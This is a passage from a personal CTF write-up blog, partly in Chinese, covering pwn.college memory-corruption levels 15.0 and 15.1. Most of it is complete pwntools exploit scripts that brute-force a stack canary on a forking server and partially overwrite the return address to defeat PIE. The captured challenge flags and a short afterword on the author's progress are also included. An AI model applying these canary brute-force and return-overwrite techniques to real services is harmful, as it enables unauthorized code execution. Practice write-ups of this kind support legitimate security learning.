    parent = psutil.Process(parent_pid)
28
    children = parent.children()
29

30
    log.success(f"Parent process: {parent_pid} -> Found children: {children}")
31
    if len(children) != 1:
32
        raise Exception(f"Expected 1 child process, found {len(children)}")
33
    return children[0].pid
34

35

36
def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
37
    if local:
38
        elf = ELF(FILE)
39
        context.binary = elf
40

41
        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)
42

43
        if debug:
44
            if attach:
45
                with open(os.devnull, "w") as fnull:
46
                    subprocess.Popen(
47
                        [context.terminal[0], "-e", "nc", "localhost", "1337"],
48
                        stderr=fnull,
49
                    )
50
                    sleep(3)
51

52
                child_pid = get_forked_pid(target.pid)
53
                gdb.attach(target=child_pid, gdbscript=gdbscript)
54

55
                return remote(HOST, PORT)
56
            else:
57
                target.close()
58

59
                return gdb.debug(
60
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
61
                )
62
        else:
63
            return process([elf.path] + (argv or []), env=envp)
64
    else:
65
        return remote(HOST, PORT)
66

67

68
padding_to_canary = b"".ljust(0x78, b"A")
69
padding_to_ret = b"".ljust(0x8, b"A")
70
fixed_offset = b"\x6b"
71
possible_bytes = [bytes([i]) for i in range(0xD, 0x10D, 0x10)]
72

73

74
def send_payload(target, payload):
75
    try:
76
        payload_size = f"{len(payload)}".encode()
77

78
        target.sendlineafter(b"Payload size: ", payload_size)
79
        target.sendafter(b"Send your payload", payload)
80
    except Exception as e:
81
        log.exception(f"An error occurred while sending payload: {e}")
82

83

84
def brute_force_canary():
85
    canary = b"\x00"
86
    start_time = time.time()
87

88
    log.progress("Brute-forcing the canary...")
89

90
    while len(canary) < 0x8:
91
        for byte in range(0x0, 0xFF):
92
            with remote(HOST, PORT) as target:
93
                send_payload(target, padding_to_canary + canary + bytes([byte]))
94

95
                response = target.recvall(timeout=5)
96

97
                if b"*** stack smashing detected ***" not in response:
98
                    canary += bytes([byte])
99
                    break
100

101
    end_time = time.time()
102
    elapsed_time = end_time - start_time
103

104
    log.success(
105
        f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds"
106
    )
107
    sleep(1)
108

109
    return canary
110

111

112
def construct_payload(canary):
113
    payload = padding_to_canary
114
    payload += canary
115
    payload += padding_to_ret
116
    payload += fixed_offset + random.choice(possible_bytes)
117

118
    return payload
119

120

121
def attack(payload):
122
    try:
123
        with remote(HOST, PORT) as target:
124
            send_payload(target, payload)
125

126
            response = target.recvall(timeout=5)
127

128
            return b"pwn.college{" in response
129
    except Exception as e:
130
        log.exception(f"An error occurred while performing attack: {e}")
131

132

133
def main():
134
    launch()
135
    canary = brute_force_canary()
136

137
    while True:
138
        try:
139
            payload = construct_payload(canary)
140

141
            if attack(payload):
142
                log.success("Success! Exiting...")
143

144
                pause()
145
                exit()
146
        except Exception as e:
147
            log.exception(f"An error occurred in main loop: {e}")
148

149

150
if __name__ == "__main__":
151
    main()

Flag

Flag: pwn.college{MiU_dCA8jccj_TYZgFn1iejPdTj.01NxMDL5cTNxgzW}

Level 15.1

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.

Write-up

不用讲吧，思路见上题。

Exploit

1
#!/usr/bin/python3
2

3
import os
4
import subprocess
5
import time
6

7
import psutil
8
from pwn import ELF, context, gdb, log, pause, process, random, remote, sleep
9

10
context(log_level="debug", terminal="kitty")
11

12
FILE = "./babymem-level-15-1"
13
HOST, PORT = "localhost", 1337
14

15
gdbscript = """
16
set follow-fork-mode child
17
b *challenge+213
18
c
19
"""
20

21

22
def to_hex_bytes(data):
23
    return "".join(f"\\x{byte:02x}" for byte in data)
24

25

26
def get_forked_pid(parent_pid):
27
    parent = psutil.Process(parent_pid)
28
    children = parent.children()
29

30
    log.success(f"Parent process: {parent_pid} -> Found children: {children}")
31
    if len(children) != 1:
32
        raise Exception(f"Expected 1 child process, found {len(children)}")
33
    return children[0].pid
34

35

36
def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
37
    if local:
38
        elf = ELF(FILE)
39
        context.binary = elf
40

41
        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)
42

43
        if debug:
44
            if attach:
45
                with open(os.devnull, "w") as fnull:
46
                    subprocess.Popen(
47
                        [context.terminal[0], "-e", "nc", "localhost", "1337"],
48
                        stderr=fnull,
49
                    )
50
                    sleep(3)
51

52
                child_pid = get_forked_pid(target.pid)
53
                gdb.attach(target=child_pid, gdbscript=gdbscript)
54

55
                return remote(HOST, PORT)
56
            else:
57
                target.close()
58

59
                return gdb.debug(
60
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
61
                )
62
        else:
63
            return process([elf.path] + (argv or []), env=envp)
64
    else:
65
        return remote(HOST, PORT)
66

67

68
padding_to_canary = b"".ljust(0x48, b"A")
69
padding_to_ret = b"".ljust(0x8, b"A")
70
fixed_offset = b"\xcd"
71
possible_bytes = [bytes([i]) for i in range(0x5, 0x105, 0x10)]
72

73

74
def send_payload(target, payload):
75
    try:
76
        payload_size = f"{len(payload)}".encode()
77

78
        target.sendlineafter(b"Payload size: ", payload_size)
79
        target.sendafter(b"Send your payload", payload)
80
    except Exception as e:
81
        log.exception(f"An error occurred while sending payload: {e}")
82

83

84
def brute_force_canary():
85
    canary = b"\x00"
86
    start_time = time.time()
87

88
    while len(canary) < 0x8:
89
        for byte in range(0x0, 0xFF):
90
            with remote(HOST, PORT) as target:
91
                log.progress("Brute-forcing the canary...")
92
                send_payload(target, padding_to_canary + canary + bytes([byte]))
93

94
                response = target.recvall(timeout=5)
95

96
                if b"*** stack smashing detected ***" not in response:
97
                    canary += bytes([byte])
98
                    break
99

100
    end_time = time.time()
101
    elapsed_time = end_time - start_time
102

103
    log.success(
104
        f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds"
105
    )
106
    sleep(1)
107

108
    return canary
109

110

111
def construct_payload(canary):
112
    payload = padding_to_canary
113
    payload += canary
114
    payload += padding_to_ret
115
    payload += fixed_offset + random.choice(possible_bytes)
116

117
    return payload
118

119

120
def attack(payload):
121
    try:
122
        with remote(HOST, PORT) as target:
123
            send_payload(target, payload)
124

125
            response = target.recvall(timeout=5)
126

127
            return b"pwn.college{" in response
128
    except Exception as e:
129
        log.exception(f"An error occurred while performing attack: {e}")
130

131

132
def main():
133
    launch()
134
    canary = brute_force_canary()
135

136
    while True:
137
        try:
138
            payload = construct_payload(canary)
139

140
            if attack(payload):
141
                log.success("Success! Exiting...")
142

143
                pause()
144
                exit()
145
        except Exception as e:
146
            log.exception(f"An error occurred in main loop: {e}")
147

148

149
if __name__ == "__main__":
150
    main()

Flag

Flag: pwn.college{8C2ZHb8LE-O7bRe0DvQeo4_5XUV.0FOxMDL5cTNxgzW}

后记

pwn.college 的题目质量没得说，我感觉很棒。打完这 30 题一共花了我 18 天，感觉挺慢的，但算了一下天数好像也没花太久吧哈哈哈。那么，下一站，Shellcode Injection！

马上就放寒假了，不知道我能在下次开学前达到什么水平呢 >w<

让我们拭目以待。

~~唉，寒假还得准备英语等级考试，爷的时间啊！:sob:~~

~~话说，如果你不写后记，你一定不知道写后记有多爽 bushi~~

~~Alr, right now, let’s sleep!~~ Let’s liberate~